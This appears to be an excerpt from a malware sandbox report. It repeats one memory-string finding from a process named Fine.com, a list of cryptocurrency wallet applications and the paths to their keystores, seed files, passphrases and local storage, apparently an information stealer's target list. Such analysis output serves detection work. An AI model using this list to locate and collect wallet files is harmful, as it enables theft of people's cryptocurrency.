          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
